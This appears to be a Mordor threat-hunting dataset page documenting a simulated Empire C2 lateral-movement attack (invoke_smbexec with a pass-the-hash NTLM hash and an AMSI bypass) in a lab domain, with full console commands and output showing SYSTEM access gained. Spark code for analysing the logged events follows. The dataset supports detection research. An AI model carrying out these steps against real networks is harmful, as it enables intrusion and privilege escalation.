Empire Invoke SMBExec

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0008’]

Techniques

[‘T1021.002’]

Tags

[‘RPC CreateService’, ‘RPC StartService’, ‘SMB Svcctl’]

Dataset Description

This dataset represents adversaries remotely creating and starting a service via RPC methods over SMB named pipes such as svcctl.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

invoke_smbexec

Adversary View

(Empire: 7ADX8ZVR) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         8948   5/0.0    2020-09-20 06:34:21  http            


(Empire: agents) > interact 7ADX8ZVR
(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8
(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo
(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire
(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_smbexec) > info

              Name: Invoke-SMBExec
            Module: powershell/lateral_movement/invoke_smbexec
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @rvrsh3ll

Description:
  Executes a stager on remote hosts using SMBExec.ps1. This
  module requires a username and NTLM hash

Comments:
  https://raw.githubusercontent.com/Kevin-Robertson/Invoke-
  TheHash/master/Invoke-SMBExec.ps1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        7ADX8ZVR                  Agent to run module on.                 
  CredID           False                                 CredID from the store to use.           
  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma 
                              cal                       separated.                              
  Username         True        pgustavo                  Username.                               
  Domain           False       theshire                  Domain.                                 
  Hash             True        81d310fa34e6a56a31145445  NTLM Hash in LM:NTLM or NTLM format.    
                              891bb7b8                
  Service          False                                 Name of service to create and delete.   
                                                        Defaults to 20 char random.             
  Listener         False       http                      Listener to use.                        
  Command          False                                 Custom command to run.                  
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_smbexec) > execute
[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT
[*] Agent 7ADX8ZVR tasked with task ID 3
[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) > 
Command executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent 3KL8YRUB checked in
[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 3KL8YRUB at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_smbexec) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         8948   5/0.0    2020-09-20 06:57:53  http            

3KL8YRUB ps 172.18.39.6     WORKSTATION6      *THESHIRE\SYSTEM        powershell         1152   5/0.0    2020-09-20 06:57:49  http            

(Empire: agents) > interact 3KL8YRUB
(Empire: 3KL8YRUB) > shell whoami
[*] Tasked 3KL8YRUB to run TASK_SHELL
[*] Agent 3KL8YRUB tasked with task ID 1
(Empire: 3KL8YRUB) > 
nt authority\system

..Command execution completed.

(Empire: 3KL8YRUB) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |3441 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |939  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |535  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |388  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |297  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |253  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |240  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |220  |
|WORKSTATION6               |Windows PowerShell                      |800    |183  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |145  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |136  |
|WORKSTATION6.theshire.local|security                                |4658   |101  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |73   |
|WORKSTATION6.theshire.local|security                                |4656   |60   |
|WORKSTATION5.theshire.local|Security                                |4658   |52   |
|WORKSTATION6.theshire.local|security                                |4690   |51   |
|WORKSTATION6.theshire.local|security                                |4663   |33   |
|WORKSTATION6.theshire.local|security                                |5158   |33   |
|WORKSTATION5.theshire.local|Security                                |4690   |26   |
|MORDORDC.theshire.local    |Security                                |5156   |26   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows